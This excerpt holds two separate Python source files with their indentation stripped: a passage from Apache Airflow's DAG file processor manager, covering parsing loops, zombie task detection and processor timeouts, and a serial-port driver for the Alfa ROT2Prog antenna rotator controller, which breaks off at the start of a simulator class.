raise ValueError("Process not started.")
try:
self._parent_signal_conn.send(request)
except ConnectionError:
# If this died cos of an error then we will noticed and restarted
# when harvest_serialized_dags calls _heartbeat_manager.
pass
def send_sla_callback_request_to_execute(self, full_filepath: str, dag_id: str) -> None:
"""
Sends information about the SLA callback to be executed by DagFileProcessor.
:param full_filepath: DAG File path
:type full_filepath: str
:param dag_id: DAG ID
:type dag_id: str
"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
try:
request = SlaCallbackRequest(full_filepath=full_filepath, dag_id=dag_id)
self._parent_signal_conn.send(request)
except ConnectionError:
# If this died cos of an error then we will noticed and restarted
# when harvest_serialized_dags calls _heartbeat_manager.
pass
def wait_until_finished(self) -> None:
"""Waits until DAG parsing is finished."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
if self._async_mode:
raise RuntimeError("wait_until_finished should only be called in sync_mode")
while self._parent_signal_conn.poll(timeout=None):
try:
result = self._parent_signal_conn.recv()
except EOFError:
return
self._process_message(result)
if isinstance(result, DagParsingStat):
# In sync mode (which is the only time we call this function) we don't send this message from
# the Manager until all the running processors have finished
return
@staticmethod
def _run_processor_manager(
dag_directory: str,
max_runs: int,
processor_timeout: timedelta,
signal_conn: MultiprocessingConnection,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
) -> None:
# Make this process start as a new process group - that makes it easy
# to kill all sub-process of this at the OS-level, rather than having
# to iterate the child processes
os.setpgid(0, 0)
setproctitle("airflow scheduler -- DagFileProcessorManager")
# Reload configurations and settings to avoid collision with parent process.
# Because this process may need custom configurations that cannot be shared,
# e.g. RotatingFileHandler. And it can cause connection corruption if we
# do not recreate the SQLA connection pool.
os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER'] = 'True'
os.environ['AIRFLOW__LOGGING__COLORED_CONSOLE_LOG'] = 'False'
# Replicating the behavior of how logging module was loaded
# in logging_config.py
importlib.reload(import_module(airflow.settings.LOGGING_CLASS_PATH.rsplit('.', 1)[0])) # type: ignore
importlib.reload(airflow.settings)
airflow.settings.initialize()
del os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER']
processor_manager = DagFileProcessorManager(
dag_directory,
max_runs,
processor_timeout,
signal_conn,
dag_ids,
pickle_dags,
async_mode,
)
processor_manager.start()
def heartbeat(self) -> None:
"""Check if the DagFileProcessorManager process is alive, and process any pending messages"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
# Receive any pending messages before checking if the process has exited.
while self._parent_signal_conn.poll(timeout=0.01):
try:
result = self._parent_signal_conn.recv()
except (EOFError, ConnectionError):
break
self._process_message(result)
# If it died unexpectedly restart the manager process
self._heartbeat_manager()
def _process_message(self, message):
self.log.debug("Received message of type %s", type(message).__name__)
if isinstance(message, DagParsingStat):
self._sync_metadata(message)
else:
raise RuntimeError(f"Unexpected message received of type {type(message).__name__}")
def _heartbeat_manager(self):
"""Heartbeat DAG file processor and restart it if we are not done."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
if self._process and not self._process.is_alive():
self._process.join(timeout=0)
if not self.done:
self.log.warning(
"DagFileProcessorManager (PID=%d) exited with exit code %d - re-launching",
self._process.pid,
self._process.exitcode,
)
self.start()
if self.done:
return
parsing_stat_age = time.monotonic() - self._last_parsing_stat_received_at
if parsing_stat_age > self._processor_timeout.total_seconds():
Stats.incr('dag_processing.manager_stalls')
self.log.error(
"DagFileProcessorManager (PID=%d) last sent a heartbeat %.2f seconds ago! Restarting it",
self._process.pid,
parsing_stat_age,
)
reap_process_group(self._process.pid, logger=self.log)
self.start()
def _sync_metadata(self, stat):
"""Sync metadata from stat queue and only keep the latest stat."""
self._done = stat.done
self._all_files_processed = stat.all_files_processed
self._last_parsing_stat_received_at = time.monotonic()
@property
def done(self) -> bool:
"""Has DagFileProcessorManager ended?"""
return self._done
@property
def all_files_processed(self):
"""Have all files been processed at least once?"""
return self._all_files_processed
def terminate(self):
"""
Send termination signal to DAG parsing processor manager
and expect it to terminate all DAG file processors.
"""
if self._process and self._process.is_alive():
self.log.info("Sending termination message to manager.")
try:
self._parent_signal_conn.send(DagParsingSignal.TERMINATE_MANAGER)
except ConnectionError:
pass
def end(self):
"""
Terminate (and then kill) the manager process launched.
:return:
"""
if not self._process:
self.log.warning('Ending without manager process.')
return
# Give the Manager some time to cleanly shut down, but not too long, as
# it's better to finish sooner than wait for (non-critical) work to
# finish
self._process.join(timeout=1.0)
reap_process_group(self._process.pid, logger=self.log)
self._parent_signal_conn.close()
class DagFileProcessorManager(LoggingMixin):
"""
Given a list of DAG definition files, this kicks off several processors
in parallel to process them and put the results to a multiprocessing.Queue
for DagFileProcessorAgent to harvest. The parallelism is limited and as the
processors finish, more are launched. The files are processed over and
over again, but no more often than the specified interval.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param signal_conn: connection to communicate signal with processor agent.
:type signal_conn: MultiprocessingConnection
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param pickle_dags: whether to pickle DAGs.
:type pickle_dags: bool
:param async_mode: whether to start the manager in async mode
:type async_mode: bool
"""
def __init__(
self,
dag_directory: Union[str, "pathlib.Path"],
max_runs: int,
processor_timeout: timedelta,
signal_conn: MultiprocessingConnection,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool = True,
):
super().__init__()
self._file_paths: List[str] = []
self._file_path_queue: List[str] = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._signal_conn = signal_conn
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._async_mode = async_mode
self._parsing_start_time: Optional[int] = None
# Set the signal conn in to non-blocking mode, so that attempting to
# send when the buffer is full errors, rather than hangs for-ever
# attempting to send (this is to avoid deadlocks!)
#
# Don't do this in sync_mode, as we _need_ the DagParsingStat sent to
# continue the scheduler
if self._async_mode:
os.set_blocking(self._signal_conn.fileno(), False)
self._parallelism = conf.getint('scheduler', 'parsing_processes')
if conf.get('core', 'sql_alchemy_conn').startswith('sqlite') and self._parallelism > 1:
self.log.warning(
"Because we cannot use more than 1 thread (parsing_processes = "
"%d ) when using sqlite. So we set parallelism to 1.",
self._parallelism,
)
self._parallelism = 1
# Parse and schedule each file no faster than this interval.
self._file_process_interval = conf.getint('scheduler', 'min_file_process_interval')
# How often to print out DAG file processing stats to the log. Default to
# 30 seconds.
self.print_stats_interval = conf.getint('scheduler', 'print_stats_interval')
# How many seconds do we wait for tasks to heartbeat before mark them as zombies.
self._zombie_threshold_secs = conf.getint('scheduler', 'scheduler_zombie_task_threshold')
# Should store dag file source in a database?
self.store_dag_code = STORE_DAG_CODE
# Map from file path to the processor
self._processors: Dict[str, DagFileProcessorProcess] = {}
self._num_run = 0
# Map from file path to stats about the file
self._file_stats: Dict[str, DagFileStat] = {}
self._last_zombie_query_time = None
# Last time that the DAG dir was traversed to look for files
self.last_dag_dir_refresh_time = timezone.make_aware(datetime.fromtimestamp(0))
# Last time stats were printed
self.last_stat_print_time = 0
# TODO: Remove magic number
self._zombie_query_interval = 10
# How long to wait before timing out a process to parse a DAG file
self._processor_timeout = processor_timeout
# How often to scan the DAGs directory for new files. Default to 5 minutes.
self.dag_dir_list_interval = conf.getint('scheduler', 'dag_dir_list_interval')
# Mapping file name and callbacks requests
self._callback_to_execute: Dict[str, List[CallbackRequest]] = defaultdict(list)
self._log = logging.getLogger('airflow.processor_manager')
self.waitables: Dict[Any, Union[MultiprocessingConnection, DagFileProcessorProcess]] = {
self._signal_conn: self._signal_conn,
}
def register_exit_signals(self):
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
# So that we ignore the debug dump signal, making it easier to send
signal.signal(signal.SIGUSR2, signal.SIG_IGN)
def _exit_gracefully(self, signum, frame):
"""Helper method to clean up DAG file processors to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
self.log.debug("Current Stacktrace is: %s", '\n'.join(map(str, inspect.stack())))
self.terminate()
self.end()
self.log.debug("Finished terminating DAG processors.")
sys.exit(os.EX_OK)
def start(self):
"""
Use multiple processes to parse and generate tasks for the
DAGs in parallel. By processing them in separate processes,
we can get parallelism and isolation from potentially harmful
user code.
"""
self.register_exit_signals()
# Start a new process group
os.setpgid(0, 0)
self.log.info("Processing files using up to %s processes at a time ", self._parallelism)
self.log.info("Process each file at most once every %s seconds", self._file_process_interval)
self.log.info(
"Checking for new files in %s every %s seconds", self._dag_directory, self.dag_dir_list_interval
)
return self._run_parsing_loop()
def _run_parsing_loop(self):
# In sync mode we want timeout=None -- wait forever until a message is received
if self._async_mode:
poll_time = 0.0
else:
poll_time = None
self._refresh_dag_dir()
self.prepare_file_path_queue()
if self._async_mode:
# If we're in async mode, we can start up straight away. If we're
# in sync mode we need to be told to start a "loop"
self.start_new_processes()
while True:
loop_start_time = time.monotonic()
ready = multiprocessing.connection.wait(self.waitables.keys(), timeout=poll_time)
if self._signal_conn in ready:
agent_signal = self._signal_conn.recv()
self.log.debug("Received %s signal from DagFileProcessorAgent", agent_signal)
if agent_signal == DagParsingSignal.TERMINATE_MANAGER:
self.terminate()
break
elif agent_signal == DagParsingSignal.END_MANAGER:
self.end()
sys.exit(os.EX_OK)
elif agent_signal == DagParsingSignal.AGENT_RUN_ONCE:
# continue the loop to parse dags
pass
elif isinstance(agent_signal, CallbackRequest):
self._add_callback_to_queue(agent_signal)
else:
raise ValueError(f"Invalid message {type(agent_signal)}")
if not ready and not self._async_mode:
# In "sync" mode we don't want to parse the DAGs until we
# are told to (as that would open another connection to the
# SQLite DB which isn't a good practice
# This shouldn't happen, as in sync mode poll should block for
# ever. Lets be defensive about that.
self.log.warning(
"wait() unexpectedly returned nothing ready after infinite timeout (%r)!", poll_time
)
continue
for sentinel in ready:
if sentinel is self._signal_conn:
continue
processor = self.waitables.get(sentinel)
if not processor:
continue
self._collect_results_from_processor(processor)
self.waitables.pop(sentinel)
self._processors.pop(processor.file_path)
self._refresh_dag_dir()
self._find_zombies()
self._kill_timed_out_processors()
# Generate more file paths to process if we processed all the files
# already.
if not self._file_path_queue:
self.emit_metrics()
self.prepare_file_path_queue()
self.start_new_processes()
# Update number of loop iteration.
self._num_run += 1
if not self._async_mode:
self.log.debug("Waiting for processors to finish since we're using sqlite")
# Wait until the running DAG processors are finished before
# sending a DagParsingStat message back. This means the Agent
# can tell we've got to the end of this iteration when it sees
# this type of message
self.wait_until_finished()
# Collect anything else that has finished, but don't kick off any more processors
self.collect_results()
self._print_stat()
all_files_processed = all(self.get_last_finish_time(x) is not None for x in self.file_paths)
max_runs_reached = self.max_runs_reached()
try:
self._signal_conn.send(
DagParsingStat(
max_runs_reached,
all_files_processed,
)
)
except BlockingIOError:
# Try again next time around the loop!
# It is better to fail, than it is deadlock. This should
# "almost never happen" since the DagParsingStat object is
# small, and in async mode this stat is not actually _required_
# for normal operation (It only drives "max runs")
self.log.debug("BlockingIOError received trying to send DagParsingStat, ignoring")
if max_runs_reached:
self.log.info(
"Exiting dag parsing loop as all files have been processed %s times", self._max_runs
)
break
if self._async_mode:
loop_duration = time.monotonic() - loop_start_time
if loop_duration < 1:
poll_time = 1 - loop_duration
else:
poll_time = 0.0
def _add_callback_to_queue(self, request: CallbackRequest):
self._callback_to_execute[request.full_filepath].append(request)
# Callback has a higher priority over DAG Run scheduling
if request.full_filepath in self._file_path_queue:
# Remove file paths matching request.full_filepath from self._file_path_queue
# Since we are already going to use that filepath to run callback,
# there is no need to have same file path again in the queue
self._file_path_queue = [
file_path for file_path in self._file_path_queue if file_path != request.full_filepath
]
self._file_path_queue.insert(0, request.full_filepath)
def _refresh_dag_dir(self):
"""Refresh file paths from dag dir if we haven't done it for too long."""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_dag_dir_refresh_time).total_seconds()
if elapsed_time_since_refresh > self.dag_dir_list_interval:
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self._dag_directory)
self._file_paths = list_py_file_paths(self._dag_directory)
self.last_dag_dir_refresh_time = now
self.log.info("There are %s files in %s", len(self._file_paths), self._dag_directory)
self.set_file_paths(self._file_paths)
try:
self.log.debug("Removing old import errors")
self.clear_nonexistent_import_errors()
except Exception:
self.log.exception("Error removing old import errors")
SerializedDagModel.remove_deleted_dags(self._file_paths)
DagModel.deactivate_deleted_dags(self._file_paths)
if self.store_dag_code:
from airflow.models.dagcode import DagCode
DagCode.remove_deleted_code(self._file_paths)
def _print_stat(self):
"""Occasionally print out stats about how fast the files are getting processed"""
if 0 < self.print_stats_interval < time.monotonic() - self.last_stat_print_time:
if self._file_paths:
self._log_file_processing_stats(self._file_paths)
self.last_stat_print_time = time.monotonic()
@provide_session
def clear_nonexistent_import_errors(self, session):
"""
Clears import errors for files that no longer exist.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
"""
query = session.query(errors.ImportError)
if self._file_paths:
query = query.filter(~errors.ImportError.filename.in_(self._file_paths))
query.delete(synchronize_session='fetch')
session.commit()
def _log_file_processing_stats(self, known_file_paths):
"""
Print out stats about how files are getting processed.
:param known_file_paths: a list of file paths that may contain Airflow
DAG definitions
:type known_file_paths: list[unicode]
:return: None
"""
# File Path: Path to the file containing the DAG definition
# PID: PID associated with the process that's processing the file. May
# be empty.
# Runtime: If the process is currently running, how long it's been
# running for in seconds.
# Last Runtime: If the process ran before, how long did it take to
# finish in seconds
# Last Run: When the file finished processing in the previous run.
headers = ["File Path", "PID", "Runtime", "# DAGs", "# Errors", "Last Runtime", "Last Run"]
rows = []
now = timezone.utcnow()
for file_path in known_file_paths:
last_runtime = self.get_last_runtime(file_path)
num_dags = self.get_last_dag_count(file_path)
num_errors = self.get_last_error_count(file_path)
file_name = os.path.basename(file_path)
file_name = os.path.splitext(file_name)[0].replace(os.sep, '.')
processor_pid = self.get_pid(file_path)
processor_start_time = self.get_start_time(file_path)
runtime = (now - processor_start_time) if processor_start_time else None
last_run = self.get_last_finish_time(file_path)
if last_run:
seconds_ago = (now - last_run).total_seconds()
Stats.gauge(f'dag_processing.last_run.seconds_ago.{file_name}', seconds_ago)
if runtime:
Stats.timing(f'dag_processing.last_duration.{file_name}', runtime)
rows.append((file_path, processor_pid, runtime, num_dags, num_errors, last_runtime, last_run))
# Sort by longest last runtime. (Can't sort None values in python3)
rows = sorted(rows, key=lambda x: x[3] or 0.0)
formatted_rows = []
for file_path, pid, runtime, num_dags, num_errors, last_runtime, last_run in rows:
formatted_rows.append(
(
file_path,
pid,
f"{runtime.total_seconds():.2f}s" if runtime else None,
num_dags,
num_errors,
f"{last_runtime:.2f}s" if last_runtime else None,
last_run.strftime("%Y-%m-%dT%H:%M:%S") if last_run else None,
)
)
log_str = (
"\n"
+ "=" * 80
+ "\n"
+ "DAG File Processing Stats\n\n"
+ tabulate(formatted_rows, headers=headers)
+ "\n"
+ "=" * 80
)
self.log.info(log_str)
def get_pid(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the PID of the process processing the given file or None if
the specified file is not being processed
:rtype: int
"""
if file_path in self._processors:
return self._processors[file_path].pid
return None
def get_all_pids(self):
"""
:return: a list of the PIDs for the processors that are running
:rtype: List[int]
"""
return [x.pid for x in self._processors.values()]
def get_last_runtime(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the runtime (in seconds) of the process of the last run, or
None if the file was never processed.
:rtype: float
"""
stat = self._file_stats.get(file_path)
return stat.last_duration if stat else None
def get_last_dag_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of dags loaded from that file, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.num_dags if stat else None
def get_last_error_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of import errors from processing, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.import_errors if stat else None
def get_last_finish_time(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the finish time of the process of the last run, or None if the
file was never processed.
:rtype: datetime
"""
stat = self._file_stats.get(file_path)
return stat.last_finish_time if stat else None
def get_start_time(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the start time of the process that's processing the
specified file or None if the file is not currently being processed
:rtype: datetime
"""
if file_path in self._processors:
return self._processors[file_path].start_time
return None
def get_run_count(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the number of times the given file has been parsed
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.run_count if stat else 0
def set_file_paths(self, new_file_paths):
"""
Update this with a new set of paths to DAG definition files.
:param new_file_paths: list of paths to DAG definition files
:type new_file_paths: list[unicode]
:return: None
"""
self._file_paths = new_file_paths
self._file_path_queue = [x for x in self._file_path_queue if x in new_file_paths]
# Stop processors that are working on deleted files
filtered_processors = {}
for file_path, processor in self._processors.items():
if file_path in new_file_paths:
filtered_processors[file_path] = processor
else:
self.log.warning("Stopping processor for %s", file_path)
Stats.decr('dag_processing.processes')
processor.terminate()
self._file_stats.pop(file_path)
self._processors = filtered_processors
def wait_until_finished(self):
"""Sleeps until all the processors are done."""
for processor in self._processors.values():
while not processor.done:
time.sleep(0.1)
def _collect_results_from_processor(self, processor) -> None:
self.log.debug("Processor for %s finished", processor.file_path)
Stats.decr('dag_processing.processes')
last_finish_time = timezone.utcnow()
if processor.result is not None:
num_dags, count_import_errors = processor.result
else:
self.log.error(
"Processor for %s exited with return code %s.", processor.file_path, processor.exit_code
)
count_import_errors = -1
num_dags = 0
stat = DagFileStat(
num_dags=num_dags,
import_errors=count_import_errors,
last_finish_time=last_finish_time,
last_duration=(last_finish_time - processor.start_time).total_seconds(),
run_count=self.get_run_count(processor.file_path) + 1,
)
self._file_stats[processor.file_path] = stat
def collect_results(self) -> None:
"""Collect the result from any finished DAG processors"""
ready = multiprocessing.connection.wait(self.waitables.keys() - [self._signal_conn], timeout=0)
for sentinel in ready:
if sentinel is self._signal_conn:
continue
processor = cast(DagFileProcessorProcess, self.waitables[sentinel])
self.waitables.pop(processor.waitable_handle)
self._processors.pop(processor.file_path)
self._collect_results_from_processor(processor)
self.log.debug("%s/%s DAG parsing processes running", len(self._processors), self._parallelism)
self.log.debug("%s file paths queued for processing", len(self._file_path_queue))
@staticmethod
def _create_process(file_path, pickle_dags, dag_ids, callback_requests):
"""Creates DagFileProcessorProcess instance."""
return DagFileProcessorProcess(
file_path=file_path, pickle_dags=pickle_dags, dag_ids=dag_ids, callback_requests=callback_requests
)
def start_new_processes(self):
"""Start more processors if we have enough slots and files to process"""
while self._parallelism - len(self._processors) > 0 and self._file_path_queue:
file_path = self._file_path_queue.pop(0)
# Stop creating duplicate processor i.e. processor with the same filepath
if file_path in self._processors.keys():
continue
callback_to_execute_for_file = self._callback_to_execute[file_path]
processor = self._create_process(
file_path, self._pickle_dags, self._dag_ids, callback_to_execute_for_file
)
del self._callback_to_execute[file_path]
Stats.incr('dag_processing.processes')
processor.start()
self.log.debug("Started a process (PID: %s) to generate tasks for %s", processor.pid, file_path)
self._processors[file_path] = processor
self.waitables[processor.waitable_handle] = processor
def prepare_file_path_queue(self):
"""Generate more file paths to process. Result are saved in _file_path_queue."""
self._parsing_start_time = time.perf_counter()
# If the file path is already being processed, or if a file was
# processed recently, wait until the next batch
file_paths_in_progress = self._processors.keys()
now = timezone.utcnow()
# Sort the file paths by the parsing order mode
list_mode = conf.get("scheduler", "file_parsing_sort_mode")
files_with_mtime = {}
file_paths = []
is_mtime_mode = list_mode == "modified_time"
file_paths_recently_processed = []
for file_path in self._file_paths:
if is_mtime_mode:
files_with_mtime[file_path] = os.path.getmtime(file_path)
file_modified_time = timezone.make_aware(datetime.fromtimestamp(files_with_mtime[file_path]))
else:
file_paths.append(file_path)
file_modified_time = None
# Find file paths that were recently processed to exclude them
# from being added to file_path_queue
# unless they were modified recently and parsing mode is "modified_time"
# in which case we don't honor "self._file_process_interval" (min_file_process_interval)
last_finish_time = self.get_last_finish_time(file_path)
if (
last_finish_time is not None
and (now - last_finish_time).total_seconds() < self._file_process_interval
and not (is_mtime_mode and file_modified_time and (file_modified_time > last_finish_time))
):
file_paths_recently_processed.append(file_path)
# Sort file paths via last modified time
if is_mtime_mode:
file_paths = sorted(files_with_mtime, key=files_with_mtime.get, reverse=True)
elif list_mode == "alphabetical":
file_paths = sorted(file_paths)
elif list_mode == "random_seeded_by_host":
# Shuffle the list seeded by hostname so multiple schedulers can work on different
# set of files. Since we set the seed, the sort order will remain same per host
random.Random(get_hostname()).shuffle(file_paths)
files_paths_at_run_limit = [
file_path for file_path, stat in self._file_stats.items() if stat.run_count == self._max_runs
]
file_paths_to_exclude = set(file_paths_in_progress).union(
file_paths_recently_processed, files_paths_at_run_limit
)
# Do not convert the following list to set as set does not preserve the order
# and we need to maintain the order of file_paths for `[scheduler] file_parsing_sort_mode`
files_paths_to_queue = [
file_path for file_path in file_paths if file_path not in file_paths_to_exclude
]
for file_path, processor in self._processors.items():
self.log.debug(
"File path %s is still being processed (started: %s)",
processor.file_path,
processor.start_time.isoformat(),
)
self.log.debug("Queuing the following files for processing:\n\t%s", "\n\t".join(files_paths_to_queue))
for file_path in files_paths_to_queue:
if file_path not in self._file_stats:
self._file_stats[file_path] = DagFileStat(
num_dags=0, import_errors=0, last_finish_time=None, last_duration=None, run_count=0
)
self._file_path_queue.extend(files_paths_to_queue)
@provide_session
def _find_zombies(self, session):
"""
Find zombie task instances, which are tasks haven't heartbeated for too long
and update the current zombie list.
"""
now = timezone.utcnow()
if (
not self._last_zombie_query_time
or (now - self._last_zombie_query_time).total_seconds() > self._zombie_query_interval
):
# to avoid circular imports
from airflow.jobs.local_task_job import LocalTaskJob as LJ
self.log.info("Finding 'running' jobs without a recent heartbeat")
TI = airflow.models.TaskInstance
DM = airflow.models.DagModel
limit_dttm = timezone.utcnow() - timedelta(seconds=self._zombie_threshold_secs)
self.log.info("Failing jobs without heartbeat after %s", limit_dttm)
zombies = (
session.query(TI, DM.fileloc)
.join(LJ, TI.job_id == LJ.id)
.join(DM, TI.dag_id == DM.dag_id)
.filter(TI.state == State.RUNNING)
.filter(
or_(
LJ.state != State.RUNNING,
LJ.latest_heartbeat < limit_dttm,
)
)
.all()
)
self._last_zombie_query_time = timezone.utcnow()
for ti, file_loc in zombies:
request = TaskCallbackRequest(
full_filepath=file_loc,
simple_task_instance=SimpleTaskInstance(ti),
msg="Detected as zombie",
)
self.log.info("Detected zombie job: %s", request)
self._add_callback_to_queue(request)
Stats.incr('zombies_killed')
def _kill_timed_out_processors(self):
"""Kill any file processors that timeout to defend against process hangs."""
now = timezone.utcnow()
for file_path, processor in self._processors.items():
duration = now - processor.start_time
if duration > self._processor_timeout:
self.log.error(
"Processor for %s with PID %s started at %s has timed out, killing it.",
file_path,
processor.pid,
processor.start_time.isoformat(),
)
Stats.decr('dag_processing.processes')
Stats.incr('dag_processing.processor_timeouts')
# TODO: Remove after Airflow 2.0
Stats.incr('dag_file_processor_timeouts')
processor.kill()
def max_runs_reached(self):
""":return: whether all file paths have been processed max_runs times"""
if self._max_runs == -1: # Unlimited runs.
return False
for stat in self._file_stats.values():
if stat.run_count < self._max_runs:
return False
if self._num_run < self._max_runs:
return False
return True
def terminate(self):
"""
Stops all running processors
:return: None
"""
for processor in self._processors.values():
Stats.decr('dag_processing.processes')
processor.terminate()
def end(self):
"""
Kill all child processes on exit since we don't want to leave
them as orphaned.
"""
pids_to_kill = self.get_all_pids()
if pids_to_kill:
kill_child_processes_by_pids(pids_to_kill)
def emit_metrics(self):
"""
Emit metrics about dag parsing summary
This is called once every time around the parsing "loop" - i.e. after
all files have been parsed.
"""
parse_time = time.perf_counter() - self._parsing_start_time
Stats.gauge('dag_processing.total_parse_time', parse_time)
Stats.gauge('dagbag_size', sum(stat.num_dags for stat in self._file_stats.values()))
Stats.gauge(
'dag_processing.import_errors', sum(stat.import_errors for stat in self._file_stats.values())
)
@property
def file_paths(self):
return self._file_paths
|
rot2prog.py
|
"""This is a python interface to the Alfa ROT2Prog Controller.
"""
import logging
import serial
import time
from threading import Lock, Thread
class ReadTimeout(Exception):
"""A serial read timed out.
"""
pass
class PacketError(Exception):
"""A received packet contained an error.
"""
pass
class ROT2Prog:
"""Sends commands and receives responses from the ROT2Prog controller.
"""
_log = logging.getLogger(__name__)
_ser = None
_pulses_per_degree_lock = Lock()
_pulses_per_degree = 1
_limits_lock = Lock()
def __init__(self, port, timeout = 5):
"""Creates object and opens serial connection.
Args:
port (str): Name of serial port to connect to.
timeout (int, optional): Maximum response time from the controller.
"""
# open serial port
self._ser = serial.Serial(
port = port,
baudrate = 600,
bytesize = 8,
parity = 'N',
stopbits = 1,
timeout = timeout,
inter_byte_timeout = 0.1) # inter_byte_timeout allows continued operation after a bad packet
self._log.debug('\'' + str(self._ser.name) + '\' opened with ' + str(timeout) + "s timeout")
# get resolution from controller
self.status()
# set the limits to default values
self.set_limits()
def _send_command(self, command_packet):
"""Sends a command packet.
Args:
command_packet (list of int): Command packet queued.
"""
self._ser.write(bytearray(command_packet))
self._log.debug('Command packet sent: ' + str(list(map(hex, list(command_packet)))))
def _recv_response(self):
"""Receives a response packet.
Returns:
az (float), el (float): Tuple of current azimuth and elevation.
Raises:
PacketError: The response packet is incomplete or contains bad values.
ReadTimeout: The controller was unresponsive.
"""
# read with timeout
response_packet = list(self._ser.read(12))
# attempt to receive 12 bytes, the length of response packet
self._log.debug('Response packet received: ' + str(list(map(hex, list(response_packet)))))
if len(response_packet) != 12:
if len(response_packet) == 0:
raise ReadTimeout('Response timed out')
else:
raise PacketError('Incomplete response packet')
else:
# convert from byte values
az = (response_packet[1] * 100) + (response_packet[2] * 10) + response_packet[3] + (response_packet[4] / 10.0) - 360.0
el = (response_packet[6] * 100) + (response_packet[7] * 10) + response_packet[8] + (response_packet[9] / 10.0) - 360.0
PH = response_packet[5]
PV = response_packet[10]
az = float(round(az, 1))
el = float(round(el, 1))
# check resolution value
valid_pulses_per_degree = [1, 2, 4]
if PH != PV or PH not in valid_pulses_per_degree:
raise PacketError('Invalid controller resolution received (PH = ' + str(PH) + ', PV = ' + str(PV) + ')')
else:
with self._pulses_per_degree_lock:
self._pulses_per_degree = PH
self._log.debug('Received response')
self._log.debug('-> Azimuth: ' + str(az) + '°')
self._log.debug('-> Elevation: ' + str(el) + '°')
self._log.debug('-> PH: ' + str(PH))
self._log.debug('-> PV: ' + str(PV))
return (az, el)
def stop(self):
"""Sends a stop command to stop the rotator in the current position.
Returns:
az (float), el (float): Tuple of current azimuth and elevation.
"""
self._log.debug('Stop command queued')
cmd = [0x57, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x20]
self._send_command(cmd)
return self._recv_response()
def status(self):
"""Sends a status command to determine the current position of the rotator.
Returns:
az (float), el (float): Tuple of current azimuth and elevation.
"""
self._log.debug('Status command queued')
cmd = [0x57, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1f, 0x20]
self._send_command(cmd)
return self._recv_response()
def set(self, az, el):
"""Sends a set command to turn the rotator to the specified position.
Args:
az (float): Azimuth angle to turn rotator to.
el (float): Elevation angle to turn rotator to.
Raises:
ValueError: The inputs cannot be sent to the controller.
"""
# make sure the inputs are within limits
az = float(az)
el = float(el)
with self._limits_lock:
if az > self._max_az or az < self._min_az:
raise ValueError('Azimuth of ' + str(az) + '° is out of range [' + str(self._min_az) + '°, ' + str(self._max_az) + '°]')
if el > self._max_el or el < self._min_el:
raise ValueError('Elevation of ' + str(el) + '° is out of range [' + str(self._min_el) + '°, ' + str(self._max_el) + '°]')
self._log.debug('Set command queued')
self._log.debug('-> Azimuth: ' + str(az) + '°')
self._log.debug('-> Elevation: ' + str(el) + '°')
# encode with resolution
with self._pulses_per_degree_lock:
resolution = self._pulses_per_degree
H = int(resolution * (float(az) + 360))
V = int(resolution * (float(el) + 360))
# convert to ascii characters
H = "0000" + str(H)
V = "0000" + str(V)
# build command
cmd = [
0x57,
int(H[-4]) + 0x30, int(H[-3]) + 0x30, int(H[-2]) + 0x30, int(H[-1]) + 0x30,
resolution,
int(V[-4]) + 0x30, int(V[-3]) + 0x30, int(V[-2]) + 0x30, int(V[-1]) + 0x30,
resolution,
0x2f,
0x20]
self._send_command(cmd)
def get_limits(self):
"""Returns the minimum and maximum limits for azimuth and elevation.
Returns:
min_az (float), max_az (float), min_el (float), max_el (float): Tuple of minimum and maximum azimuth and elevation.
"""
with self._limits_lock:
return (self._min_az, self._max_az, self._min_el, self._max_el)
def set_limits(self, min_az = -180, max_az = 540, min_el = -21, max_el = 180):
"""Sets the minimum and maximum limits for azimuth and elevation.
Args:
min_az (int, optional): Minimum azimuth. Defaults to -180.
max_az (int, optional): Maximum azimuth. Defaults to 540.
min_el (int, optional): Minimum elevation. Defaults to -21.
max_el (int, optional): Maximum elevation. Defaults to 180.
"""
with self._limits_lock:
self._min_az = min_az
self._max_az = max_az
self._min_el = min_el
self._max_el = max_el
def get_pulses_per_degree(self):
"""Returns the number of pulses per degree.
Returns:
int: Pulses per degree defining the resolution of the controller.
"""
with self._pulses_per_degree_lock:
return self._pulses_per_degree
class ROT2ProgSim:
"""Receives commands and sends responses to simulate the ROT2Prog controller.
"""
_log = None
_ser = None
_retry = 5
_keep_running = True
_az = 0
_el = 0
_pulses_per_degree = 0
def __init__(self, port, pulses_per_degree):
